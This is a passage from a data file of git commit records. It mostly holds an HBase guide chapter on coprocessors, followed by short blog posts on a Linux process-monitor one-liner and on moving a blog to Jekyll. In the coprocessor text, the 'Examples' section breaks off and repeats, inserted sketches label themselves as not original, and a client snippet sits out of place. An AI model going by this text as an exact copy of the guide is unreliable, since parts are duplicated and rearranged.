coprocessor users to\ninstead switch over to use `AsyncTable`. There is a lightweight\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/Connection.html#toAsyncConnection--[toAsyncConnection]\nmethod to get an `AsyncConnection` from `Connection` if needed.\n====\n\nStarting with HBase 0.96, endpoint coprocessors are implemented using Google Protocol\nBuffers (protobuf). For more details on protobuf, see Google's\nlink:https:\/\/developers.google.com\/protocol-buffers\/docs\/proto[Protocol Buffer Guide].\nEndpoints Coprocessor written in version 0.94 are not compatible with version 0.96 or later.\nSee\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-5448[HBASE-5448]). To upgrade your\nHBase cluster from 0.94 or earlier to 0.96 or later, you need to reimplement your\ncoprocessor.\n\nIn HBase 2.x, we made use of a shaded version of protobuf 3.x, but kept the\nprotobuf for coprocessors on 2.5.0. In HBase 3.0.0, we removed all dependencies on\nnon-shaded protobuf so you need to reimplement your coprocessor to make use of the\nshaded protobuf version provided in hbase-thirdparty. Please see\nthe <<protobuf,protobuf>> section for more details.\n\nCoprocessor Endpoints should make no use of HBase internals and\nonly avail of public APIs; ideally a CPEP should depend on Interfaces\nand data structures only. This is not always possible but beware\nthat doing so makes the Endpoint brittle, liable to breakage as HBase\ninternals evolve. 
HBase internal APIs annotated as private or evolving\ndo not have to respect semantic versioning rules or general java rules on\ndeprecation before removal. While generated protobuf files are\nabsent the hbase audience annotations -- they are created by the\nprotobuf protoc tool which knows nothing of how HBase works --\nthey should be consided `@InterfaceAudience.Private` so are liable to\nchange.\n\n<<cp_example,Examples>> provides working examples of endpoint coprocessors.\n\n[[cp_loading]]\n== Loading Coprocessors\n\nTo make your coprocessor available to HBase, it must be _loaded_, either statically\n(through the HBase configuration) or dynamically (using HBase Shell or the Java API).\n\n=== Static Loading\n\nFollow these steps to statically load your coprocessor. Keep in mind that you must\nrestart HBase to unload a coprocessor that has been loaded statically.\n\n. Define the Coprocessor in _hbase-site.xml_, with a <property> element with a <name>\nand a <value> sub-element. The <name> should be one of the following:\n+\n- `hbase.coprocessor.region.classes` for RegionObservers and Endpoints.\n- `hbase.coprocessor.wal.classes` for WALObservers.\n- `hbase.coprocessor.master.classes` for MasterObservers.\n+\n<value> must contain the fully-qualified class name of your coprocessor's implementation\nclass.\n+\nFor example to load a Coprocessor (implemented in class SumEndPoint.java) you have to create\nfollowing entry in RegionServer's 'hbase-site.xml' file (generally located under 'conf' directory):\n+\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.region.classes<\/name>\n <value>org.myname.hbase.coprocessor.endpoint.SumEndPoint<\/value>\n<\/property>\n----\n+\nIf multiple classes are specified for loading, the class names must be comma-separated.\nThe framework attempts to load all the configured classes using the default class loader.\nTherefore, the jar file must reside on the server-side HBase classpath.\n\n+\nCoprocessors which are loaded in this way will be active on all regions of all tables.\nThese are also called system Coprocessor.\nThe first listed Coprocessors will be assigned the priority `Coprocessor.Priority.SYSTEM`.\nEach subsequent coprocessor in the list will have its priority value incremented by one (which\nreduces its priority, because priorities have the natural sort order of Integers).\n\n+\nThese priority values can be manually overriden in hbase-site.xml. This can be useful if you\nwant to guarantee that a coprocessor will execute after another. For example, in the following\nconfiguration `SumEndPoint` would be guaranteed to go last, except in the case of a tie with\nanother coprocessor:\n+\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.region.classes<\/name>\n <value>org.myname.hbase.coprocessor.endpoint.SumEndPoint|2147483647<\/value>\n<\/property>\n----\n\n+\nWhen calling out to registered observers, the framework executes their callbacks methods in the\nsorted order of their priority. +\nTies are broken arbitrarily.\n\n. Put your code on HBase's classpath. One easy way to do this is to drop the jar\n (containing you code and all the dependencies) into the `lib\/` directory in the\n HBase installation.\n\n. Restart HBase.\n\n\n=== Static Unloading\n\n. Delete the coprocessor's <property> element, including sub-elements, from `hbase-site.xml`.\n. Restart HBase.\n. 
Optionally, remove the coprocessor's JAR file from the classpath or HBase's `lib\/`\n directory.\n\n\n=== Dynamic Loading\n\nYou can also load a coprocessor dynamically, without restarting HBase. This may seem\npreferable to static loading, but dynamically loaded coprocessors are loaded on a\nper-table basis, and are only available to the table for which they were loaded. For\nthis reason, dynamically loaded tables are sometimes called *Table Coprocessor*.\n\nIn addition, dynamically loading a coprocessor acts as a schema change on the table,\nand the table must be taken offline to load the coprocessor.\n\nThere are three ways to dynamically load Coprocessor.\n\n[NOTE]\n.Assumptions\n====\nThe below mentioned instructions makes the following assumptions:\n\n* A JAR called `coprocessor.jar` contains the Coprocessor implementation along with all of its\ndependencies.\n* The JAR is available in HDFS in some location like\n`hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar`.\n====\n\n[[load_coprocessor_in_shell]]\n==== Using HBase Shell\n\n. Load the Coprocessor, using a command like the following:\n+\n[source]\n----\nhbase alter 'users', METHOD => 'table_att', 'Coprocessor'=>'hdfs:\/\/<namenode>:<port>\/\nuser\/<hadoop-user>\/coprocessor.jar| org.myname.hbase.Coprocessor.RegionObserverExample|1073741823|\narg1=1,arg2=2'\n----\n+\nThe Coprocessor framework will try to read the class information from the coprocessor table\nattribute value.\nThe value contains four pieces of information which are separated by the pipe (`|`) character.\n+\n* File path: The jar file containing the Coprocessor implementation must be in a location where\nall region servers can read it. +\nYou could copy the file onto the local disk on each region server, but it is recommended to store\nit in HDFS. +\nhttps:\/\/issues.apache.org\/jira\/browse\/HBASE-14548[HBASE-14548] allows a directory containing the jars\nor some wildcards to be specified, such as: hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/ or\nhdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/*.jar. Please note that if a directory is specified,\nall jar files(.jar) in the directory are added. It does not search for files in sub-directories.\nDo not use a wildcard if you would like to specify a directory. This enhancement applies to the\nusage via the JAVA API as well.\n* Class name: The full class name of the Coprocessor.\n* Priority: An integer. The framework will determine the execution sequence of all configured\nobservers registered at the same hook using priorities. This field can be left blank. In that\ncase the framework will assign a default priority value.\n* Arguments (Optional): This field is passed to the Coprocessor implementation. This is optional.\n\n. 
Verify that the coprocessor loaded:\n+\n----\nhbase(main):04:0> describe 'users'\n----\n+\nThe coprocessor should be listed in the `TABLE_ATTRIBUTES`.\n\n==== Using the Java API (all HBase versions)\n\nThe following Java code shows how to use the `setValue()` method of `HTableDescriptor`\nto load a coprocessor on the `users` table.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nhTableDescriptor.setValue(\"COPROCESSOR$1\", path + \"|\"\n+ RegionObserverExample.class.getCanonicalName() + \"|\"\n+ Coprocessor.PRIORITY_USER);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\n==== Using the Java API (HBase 0.96+ only)\n\nIn HBase 0.96 and newer, the `addCoprocessor()` method of `HTableDescriptor` provides\nan easier way to load a coprocessor dynamically.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nPath path = new Path(\"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\");\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nhTableDescriptor.addCoprocessor(RegionObserverExample.class.getCanonicalName(), path,\nCoprocessor.PRIORITY_USER, null);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\nWARNING: There is no guarantee that the framework will load a given Coprocessor successfully.\nFor example, the shell command neither guarantees a jar file exists at a particular location nor\nverifies whether the given class is actually contained in the jar file.\n\n\n=== Dynamic Unloading\n\n==== Using HBase Shell\n\n. Alter the table to remove the coprocessor.\n+\n[source]\n----\nhbase> alter 'users', METHOD => 'table_att_unset', NAME => 'coprocessor$1'\n----\n\n==== Using the Java API\n\nReload the table definition without setting the value of the coprocessor either by\nusing `setValue()` or `addCoprocessor()` methods. 
This will remove any coprocessor\nattached to the table.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\nIn HBase 0.96 and newer, you can instead use the `removeCoprocessor()` method of the\n`HTableDescriptor` class.\n\n\n[[cp_example]]\n== Examples\nHBase ships examples for Observer Coprocessor.\n\nA more detailed example is given below.\n\nThese examples assume a table called `users`, which has two column families `personalDet`\nand `salaryDet`, containing personal and salary details. Below is the graphical representation\nof the `users` table.\n\n.Users Table\n[width=\"100%\",cols=\"7\",options=\"header,footer\"]\n|====================\n| 3+|personalDet 3+|salaryDet\n|*rowkey* |*name* |*lastname* |*dob* |*gross* |*net* |*allowances*\n|admin |Admin |Admin | 3+|\n|cdickens |Charles |Dickens |02\/07\/1812 |10000 |8000 |2000\n|jverne |Jules |Verne |02\/08\/1828 |12000 |9000 |3000\n|====================\n\n\n=== Observer Example\n\nThe following Observer coprocessor prevents the details of the user `admin` from being\nreturned in a `Get` or `Scan` of the `users` table.\n\n. Write a class that implements the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionCoprocessor.html[RegionCoprocessor],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver]\nclass.\n\n. Override the `preGetOp()` method (the `preGet()` method is deprecated) to check\nwhether the client has queried for the rowkey with value `admin`. If so, return an\nempty result. Otherwise, process the request as normal.\n\n. Put your code and dependencies in a JAR file.\n\n. Place the JAR in HDFS where HBase can locate it.\n\n. Load the Coprocessor.\n\n. Write a simple program to test it.\n\nFollowing are the implementation of the above steps:\n\n[source,java]\n----\npublic class RegionObserverExample implements RegionCoprocessor, RegionObserver {\n\n private static final byte[] ADMIN = Bytes.toBytes(\"admin\");\n private static final byte[] COLUMN_FAMILY = Bytes.toBytes(\"details\");\n private static final byte[] COLUMN = Bytes.toBytes(\"Admin_det\");\n private static final byte[] VALUE = Bytes.toBytes(\"You can't see Admin details\");\n\n @Override\n public Optional<RegionObserver> getRegionObserver() {\n return Optional.of(this);\n }\n\n @Override\n public void preGetOp(final ObserverContext<RegionCoprocessorEnvironment> e, final Get get, final List<Cell> results)\n throws IOException {\n\n if (Bytes.equals(get.getRow(),ADMIN)) {\n Cell c = CellUtil.createCell(get.getRow(),COLUMN_FAMILY, COLUMN,\n System.currentTimeMillis(), (byte)4, VALUE);\n results.add(c);\n e.bypass();\n }\n }\n}\n----\n\nOverriding the `preGetOp()` will only work for `Get` operations. 
\n\n[[cp_example]]\n== Examples\nHBase ships with examples of Observer Coprocessors.\n\nA more detailed example is given below.\n\nThese examples assume a table called `users`, which has two column families `personalDet`\nand `salaryDet`, containing personal and salary details. Below is a graphical representation\nof the `users` table.\n\n.Users Table\n[width=\"100%\",cols=\"7\",options=\"header,footer\"]\n|====================\n| 3+|personalDet 3+|salaryDet\n|*rowkey* |*name* |*lastname* |*dob* |*gross* |*net* |*allowances*\n|admin |Admin |Admin | 3+|\n|cdickens |Charles |Dickens |02\/07\/1812 |10000 |8000 |2000\n|jverne |Jules |Verne |02\/08\/1828 |12000 |9000 |3000\n|====================\n\n\n=== Observer Example\n\nThe following Observer coprocessor prevents the details of the user `admin` from being\nreturned in a `Get` or `Scan` of the `users` table.\n\n. Write a class that implements the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionCoprocessor.html[RegionCoprocessor] and\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver]\ninterfaces.\n\n. Override the `preGetOp()` method (the `preGet()` method is deprecated) to check\nwhether the client has queried for the rowkey with value `admin`. If so, return a\nplaceholder result instead. Otherwise, process the request as normal.\n\n. Put your code and dependencies in a JAR file.\n\n. Place the JAR in HDFS where HBase can locate it.\n\n. Load the Coprocessor.\n\n. Write a simple program to test it (a client sketch is shown at the end of this section).\n\nThe following is an implementation of the above steps:\n\n[source,java]\n----\npublic class RegionObserverExample implements RegionCoprocessor, RegionObserver {\n\n private static final byte[] ADMIN = Bytes.toBytes(\"admin\");\n private static final byte[] COLUMN_FAMILY = Bytes.toBytes(\"details\");\n private static final byte[] COLUMN = Bytes.toBytes(\"Admin_det\");\n private static final byte[] VALUE = Bytes.toBytes(\"You can't see Admin details\");\n\n @Override\n public Optional<RegionObserver> getRegionObserver() {\n return Optional.of(this);\n }\n\n @Override\n public void preGetOp(final ObserverContext<RegionCoprocessorEnvironment> e, final Get get, final List<Cell> results)\n throws IOException {\n\n if (Bytes.equals(get.getRow(), ADMIN)) {\n Cell c = CellUtil.createCell(get.getRow(), COLUMN_FAMILY, COLUMN,\n System.currentTimeMillis(), (byte)4, VALUE);\n results.add(c);\n e.bypass();\n }\n }\n}\n----\n\nOverriding `preGetOp()` only affects `Get` operations. You also need to override\nthe `preScannerOpen()` method to filter the `admin` row from scan results.\n\n[source,java]\n----\n@Override\npublic RegionScanner preScannerOpen(final ObserverContext<RegionCoprocessorEnvironment> e, final Scan scan,\nfinal RegionScanner s) throws IOException {\n\n Filter filter = new RowFilter(CompareOp.NOT_EQUAL, new BinaryComparator(ADMIN));\n scan.setFilter(filter);\n return s;\n}\n----\n\nThis method works, but there is a _side effect_: if the client has used a filter in\nits scan, that filter will be replaced by this one. Instead, you can explicitly\nremove any `admin` results from the scan:\n\n[source,java]\n----\n@Override\npublic boolean postScannerNext(final ObserverContext<RegionCoprocessorEnvironment> e, final InternalScanner s,\nfinal List<Result> results, final int limit, final boolean hasMore) throws IOException {\n Result result = null;\n Iterator<Result> iterator = results.iterator();\n while (iterator.hasNext()) {\n result = iterator.next();\n if (Bytes.equals(result.getRow(), ADMIN)) {\n iterator.remove();\n break;\n }\n }\n return hasMore;\n}\n----
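\nTo cover the final step in the list above, a minimal client check might look like the following sketch; it is not part of the original example and assumes the coprocessor is already loaded on the `users` table:\n\n[source,java]\n----\n\/\/ Sketch: the Get for 'admin' should return the placeholder cell written by\n\/\/ preGetOp() rather than the real personal details.\nTable table = connection.getTable(TableName.valueOf(\"users\"));\nResult result = table.get(new Get(Bytes.toBytes(\"admin\")));\nfor (Cell cell : result.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneValue(cell)));\n}\n----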
\n\n=== Endpoint Example\n\nStill using the `users` table, this example implements a coprocessor to calculate\nthe sum of all employee salaries, using an endpoint coprocessor.\n\n. Create a `.proto` file defining your service.\n+\n[source]\n----\noption java_package = \"org.myname.hbase.coprocessor.autogenerated\";\noption java_outer_classname = \"Sum\";\noption java_generic_services = true;\noption java_generate_equals_and_hash = true;\noption optimize_for = SPEED;\nmessage SumRequest {\n required string family = 1;\n required string column = 2;\n}\n\nmessage SumResponse {\n required int64 sum = 1 [default = 0];\n}\n\nservice SumService {\n rpc getSum(SumRequest)\n returns (SumResponse);\n}\n----\n\n. Execute the `protoc` command to generate the Java code from the above `.proto` file.\n+\n[source]\n----\n$ mkdir src\n$ protoc --java_out=src .\/sum.proto\n----\n+\nThis will generate a class called `Sum.java`.\n\n. Write a class that extends the generated service class, implements the `Coprocessor`\nand `CoprocessorService` interfaces, and overrides the service method.\n+\nWARNING: If you load a coprocessor from `hbase-site.xml` and then load the same coprocessor\nagain using HBase Shell, it will be loaded a second time. The same class will\nexist twice, and the second instance will have a higher ID (and thus a lower priority).\nThe effect is that the duplicate coprocessor is effectively ignored.\n+\n[source, java]\n----\npublic class SumEndPoint extends Sum.SumService implements Coprocessor, CoprocessorService {\n\n private RegionCoprocessorEnvironment env;\n\n @Override\n public Service getService() {\n return this;\n }\n\n @Override\n public void start(CoprocessorEnvironment env) throws IOException {\n if (env instanceof RegionCoprocessorEnvironment) {\n this.env = (RegionCoprocessorEnvironment)env;\n } else {\n throw new CoprocessorException(\"Must be loaded on a table region!\");\n }\n }\n\n @Override\n public void stop(CoprocessorEnvironment env) throws IOException {\n \/\/ do nothing\n }\n\n @Override\n public void getSum(RpcController controller, Sum.SumRequest request, RpcCallback<Sum.SumResponse> done) {\n Scan scan = new Scan();\n scan.addFamily(Bytes.toBytes(request.getFamily()));\n scan.addColumn(Bytes.toBytes(request.getFamily()), Bytes.toBytes(request.getColumn()));\n\n Sum.SumResponse response = null;\n InternalScanner scanner = null;\n\n try {\n scanner = env.getRegion().getScanner(scan);\n List<Cell> results = new ArrayList<>();\n boolean hasMore = false;\n long sum = 0L;\n\n do {\n hasMore = scanner.next(results);\n for (Cell cell : results) {\n sum = sum + Bytes.toLong(CellUtil.cloneValue(cell));\n }\n results.clear();\n } while (hasMore);\n\n response = Sum.SumResponse.newBuilder().setSum(sum).build();\n } catch (IOException ioe) {\n ResponseConverter.setControllerException(controller, ioe);\n } finally {\n if (scanner != null) {\n try {\n scanner.close();\n } catch (IOException ignored) {}\n }\n }\n\n done.run(response);\n }\n}\n----\n+\n[source, java]\n----\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nTableName tableName = TableName.valueOf(\"users\");\nTable table = connection.getTable(tableName);\n\nfinal Sum.SumRequest request = Sum.SumRequest.newBuilder().setFamily(\"salaryDet\").setColumn(\"gross\").build();\ntry {\n Map<byte[], Long> results = table.coprocessorService(\n Sum.SumService.class,\n null, \/* start key *\/\n null, \/* end key *\/\n new Batch.Call<Sum.SumService, Long>() {\n @Override\n public Long call(Sum.SumService aggregate) throws IOException {\n BlockingRpcCallback<Sum.SumResponse> rpcCallback = new BlockingRpcCallback<>();\n aggregate.getSum(null, request, rpcCallback);\n Sum.SumResponse response = rpcCallback.get();\n\n return response.hasSum() ? response.getSum() : 0L;\n }\n }\n );\n\n for (Long sum : results.values()) {\n System.out.println(\"Sum = \" + sum);\n }\n} catch (ServiceException e) {\n e.printStackTrace();\n} catch (Throwable e) {\n e.printStackTrace();\n}\n----\n\n. Load the Coprocessor (a shell sketch is shown below).\n\n. Write client code to call the Coprocessor, as in the client snippet above.
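\nFor the loading step, attaching the endpoint through the HBase Shell might look like the following sketch; the jar location, package name, and priority here are assumptions rather than values from the original text:\n\n[source]\n----\nhbase> alter 'users', METHOD => 'table_att', 'coprocessor' => 'hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/sum.jar|org.myname.hbase.coprocessor.SumEndPoint|1001|'\n----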
\n\n== Guidelines For Deploying A Coprocessor\n\nBundling Coprocessors::\n You can bundle all classes for a coprocessor into a\n single JAR on the RegionServer's classpath, for easy deployment. Otherwise,\n place all dependencies on the RegionServer's classpath so that they can be\n loaded during RegionServer start-up. The classpath for a RegionServer is set\n in the RegionServer's `hbase-env.sh` file.\nAutomating Deployment::\n You can use a tool such as Puppet, Chef, or\n Ansible to ship the JAR for the coprocessor to the required location on your\n RegionServers' filesystems and restart each RegionServer, to automate\n coprocessor deployment. The details of such setups are outside the scope of this\n document.\nUpdating a Coprocessor::\n Deploying a new version of a given coprocessor is not as simple as disabling it,\n replacing the JAR, and re-enabling the coprocessor. This is because you cannot\n reload a class in a JVM unless you delete all the current references to it.\n Since the current JVM has a reference to the existing coprocessor, you must restart\n the JVM, by restarting the RegionServer, in order to replace it. This behavior\n is not expected to change.\nCoprocessor Logging::\n The Coprocessor framework does not provide an API for logging beyond standard Java\n logging.\nCoprocessor Configuration::\n If you do not want to load coprocessors from the HBase Shell, you can add their configuration\n properties to `hbase-site.xml`. In <<load_coprocessor_in_shell>>, two arguments are\n set: `arg1=1,arg2=2`. These could have been added to `hbase-site.xml` as follows:\n[source,xml]\n----\n<property>\n <name>arg1<\/name>\n <value>1<\/value>\n<\/property>\n<property>\n <name>arg2<\/name>\n <value>2<\/value>\n<\/property>\n----
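\nInside the coprocessor, these values can then be read from the environment's configuration. The following is a minimal sketch, not part of the original text; the property names match the ones above:\n\n[source,java]\n----\n\/\/ Sketch: reading the arguments inside the coprocessor's start() method.\n@Override\npublic void start(CoprocessorEnvironment env) throws IOException {\n Configuration conf = env.getConfiguration();\n String arg1 = conf.get(\"arg1\"); \/\/ \"1\"\n String arg2 = conf.get(\"arg2\"); \/\/ \"2\"\n}\n----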
\nYou can then test the coprocessor with client code like the following:\n[source,java]\n----\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nTableName tableName = TableName.valueOf(\"users\");\nTable table = connection.getTable(tableName);\n\nGet get = new Get(Bytes.toBytes(\"admin\"));\nResult result = table.get(get);\nfor (Cell c : result.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneRow(c))\n + \"==> \" + Bytes.toString(CellUtil.cloneFamily(c))\n + \"{\" + Bytes.toString(CellUtil.cloneQualifier(c))\n + \":\" + Bytes.toLong(CellUtil.cloneValue(c)) + \"}\");\n}\nScan scan = new Scan();\nResultScanner scanner = table.getScanner(scan);\nfor (Result res : scanner) {\n for (Cell c : res.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneRow(c))\n + \" ==> \" + Bytes.toString(CellUtil.cloneFamily(c))\n + \" {\" + Bytes.toString(CellUtil.cloneQualifier(c))\n + \":\" + Bytes.toLong(CellUtil.cloneValue(c))\n + \"}\");\n }\n}\n----\n\n== Restricting Coprocessor Usage\n\nRestricting arbitrary user coprocessors can be a big concern in multitenant environments. HBase provides a continuum of options for ensuring that only expected coprocessors are running:\n\n* `hbase.coprocessor.enabled`: Enables or disables all coprocessors. This will limit the functionality of HBase, as disabling all coprocessors will disable some security providers. An example coprocessor so affected is `org.apache.hadoop.hbase.security.access.AccessController`.\n* `hbase.coprocessor.user.enabled`: Enables or disables loading coprocessors on tables (i.e. user coprocessors).\n* One can statically load coprocessors, and optionally tune their priorities, via the following tunables in `hbase-site.xml`:\n** `hbase.coprocessor.regionserver.classes`: A comma-separated list of coprocessors that are loaded by region servers\n** `hbase.coprocessor.region.classes`: A comma-separated list of RegionObserver and Endpoint coprocessors\n** `hbase.coprocessor.user.region.classes`: A comma-separated list of coprocessors that are loaded by all regions\n** `hbase.coprocessor.master.classes`: A comma-separated list of coprocessors that are loaded by the master (MasterObserver coprocessors)\n** `hbase.coprocessor.wal.classes`: A comma-separated list of WALObserver coprocessors to load\n* `hbase.coprocessor.abortonerror`: Whether to abort the daemon that loaded the coprocessor if the coprocessor throws an error other than `IOError`. If this is set to `false` and an access controller coprocessor has a fatal error, the coprocessor will be circumvented, so in secure installations this should be set to `true`. However, one may override this on a per-table basis for user coprocessors, to ensure they do not abort their running region server and are instead unloaded on error.\n* `hbase.coprocessor.region.whitelist.paths`: A comma-separated list, used when loading `org.apache.hadoop.hbase.security.access.CoprocessorWhitelistMasterObserver`, that white-lists the paths from which coprocessors may be loaded. The following options are available:\n** Coprocessors on the classpath are implicitly white-listed\n** `*` to wildcard all coprocessor paths\n** An entire filesystem (e.g. `hdfs:\/\/my-cluster\/`)\n** A wildcard path to be evaluated by link:https:\/\/commons.apache.org\/proper\/commons-io\/javadocs\/api-release\/org\/apache\/commons\/io\/FilenameUtils.html[FilenameUtils.wildcardMatch]\n** Note: A path can be given with or without a scheme (e.g.
`file:\/\/\/usr\/hbase\/lib\/coprocessors` or for all filesystems `\/usr\/hbase\/lib\/coprocessors`)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d6858f17a8364c2f61f6e65843d177d07e0b145","subject":"Update 2015-12-13-Linux-Process-Monitor.adoc","message":"Update 2015-12-13-Linux-Process-Monitor.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-13-Linux-Process-Monitor.adoc","new_file":"_posts\/2015-12-13-Linux-Process-Monitor.adoc","new_contents":"= Linux Process Monitor\n\n=== Use watch to monitor process bar every .1 secs\n\n[source,bash]\n----\nwatch -e -n .1 'if ps cax | grep -w 'bar'; then exit 0; else exit 1; fi'\n----","old_contents":"= Linux Process Monitor\n\n== Use watch to monitor process bar every .1 secs\n\n[source,bash]\n----\nwatch -e -n .1 'if ps cax | grep -w 'bar'; then exit 0; else exit 1; fi'\n----","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c4149a22bd19309b32ed10d91c6a58d76e5fdc70","subject":"Changing subtitle","message":"Changing subtitle\n","repos":"mikrethor\/blog,mikrethor\/blog,mikrethor\/blog","old_file":"_posts\/2020-08-02-Moving-blog-to-Jekyll.adoc","new_file":"_posts\/2020-08-02-Moving-blog-to-Jekyll.adoc","new_contents":"= Moving my blog to Jekyll\n:showtitle:\n\/\/:page-excerpt: Excerpt goes here.\n\/\/:page-root: ..\/..\/..\/\n:date: 2020-08-02 23:45:13 -0400\n:layout: post\n\/\/:title: Man must explore, r sand this is exploration at its greatest\n:page-subtitle: \"Why moving away from Hubpress\"\n:page-background: \/img\/posts\/2020-08-02-Jekyll.png\n\n== Why moving away from Hubpress\n\nA few weeks ago, I decided to move my blog from Hubpress to something else.\nIndeed, Hubpress is not maintained anymore and I wanted someting close enough to want I had.\nMeaning, asciidoc (or markdown) based, publishable easily on Github Pages and with the possibility to get feedback from my audience (who knows ?).\n\n== Solution considered\n\nAfter a few minutes on the web, I decided to look more into https:\/\/gohugo.io[Hugo] and https:\/\/jekyllrb.com[Jekyll].\n\n=== Hugo\n\nHugo is written in Go and is a static website generator.\nIt's possible to use Asciidoc or Markdown and it seems to be able to use Disqus which is the comment solution I already used with Hubpress.\n\n=== Jekyll\n\nI already use Jekyll because it's the solution we use for the https:\/\/www.montreal-jug.org[Montreal Jug Website].\nSame as Hugo, Jekyll is a static website generator. 
It's possible to use Asciidoc or Markdown and Disqus.\nInstead of Hugo, it's written in Ruby.\n\n=== JBake\n\nFor the ones considering JBake, I moved from https:\/\/www.montreal-jug.org[JBake] a long time ago as you can read in my link:..\/..\/..\/2017\/10\/29\/From-J-Bke-to-Hubpress.html[post] on that.\n\n=== Decision\n\nI decided to go with Jekyll as I am already familiar with it and I don't care about performance.\nThe ones who do should consider Hugo.\n\n== Theme\n\nI did some research on the web to start with a pre-existing theme and I went with https:\/\/startbootstrap.com\/themes\/clean-blog-jekyll\/[Clean Blog]\n\n== Commenting\n\nAs I said, I already use Disqus so I didn't want to change.\nI would like a solution where the content doesn't belong to me but at the moment I didn't find any that meets my needs of owning my content.\nI am considering to move away from Disqus at some point for https:\/\/utteranc.es[utterances] that is based on Github Issues but I will be still not owning my content.\n\n== Blog migration\n\nI was already using asciidoc so I copied all my asciidoc files directly to the post folder in Jekyll.\nEverything went smoothly and all the posts where generated to HTML with all the informations needed.\n\nI add to adapt the images path with the new one in some asciidoc files contening pictures but a quick CMD+R helped me to change all the files in a nutshell.\n\nSo I avoided having to develop a batch to process all my asciidoc to migrate but with a lot more content it would have been the solution I would have used.\n\n== Automate the deployment\n\nI had never tried \"Github Actions\" before so I decided to give it a try and it was as easy as following this https:\/\/jekyllrb.com\/docs\/continuous-integration\/github-actions\/[procedure].\n\nI took a few minutes to generate \"et voil\u00e0 !\"\n\nAnd now, because you are reading those lines I guess everything worked fine.\n\n== Conclusion\n\nI miss Hubpress which has a web interface to edit the asciidoc but it's completely replaced by the automating of the deployement to the Github Pages.\n","old_contents":"= Moving my blog to Jekyll\n:showtitle:\n\/\/:page-excerpt: Excerpt goes here.\n\/\/:page-root: ..\/..\/..\/\n:date: 2020-08-02 23:45:13 -0400\n:layout: post\n\/\/:title: Man must explore, r sand this is exploration at its greatest\n:page-subtitle: \"Moving my blog to Jekyll\"\n:page-background: \/img\/posts\/2020-08-02-Jekyll.png\n\n== Why moving away from Hubpress\n\nA few weeks ago, I decided to move my blog from Hubpress to something else.\nIndeed, Hubpress is not maintained anymore and I wanted someting close enough to want I had.\nMeaning, asciidoc (or markdown) based, publishable easily on Github Pages and with the possibility to get feedback from my audience (who knows ?).\n\n== Solution considered\n\nAfter a few minutes on the web, I decided to look more into https:\/\/gohugo.io[Hugo] and https:\/\/jekyllrb.com[Jekyll].\n\n=== Hugo\n\nHugo is written in Go and is a static website generator.\nIt's possible to use Asciidoc or Markdown and it seems to be able to use Disqus which is the comment solution I already used with Hubpress.\n\n=== Jekyll\n\nI already use Jekyll because it's the solution we use for the https:\/\/www.montreal-jug.org[Montreal Jug Website].\nSame as Hugo, Jekyll is a static website generator. 
